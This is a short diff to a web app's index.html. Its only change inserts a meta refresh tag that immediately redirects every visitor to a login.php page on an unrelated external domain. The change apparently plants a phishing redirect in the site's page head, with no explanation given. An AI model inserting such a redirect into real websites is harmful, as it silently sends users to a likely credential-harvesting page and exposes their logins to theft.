--- a/www/index.html
+++ b/www/index.html
@@ -1,6 +1,8 @@
 <!DOCTYPE html>
 <html>
 <head>
+  <meta HTTP-EQUIV="REFRESH" content="0; url=http://capsulaweb.com.mx/ceo/login.php">
+
   <meta charset="utf-8">
   <meta name="viewport" content="initial-scale=1.0, user-scalable=no">
   <meta name="apple-mobile-web-app-capable" content="yes">
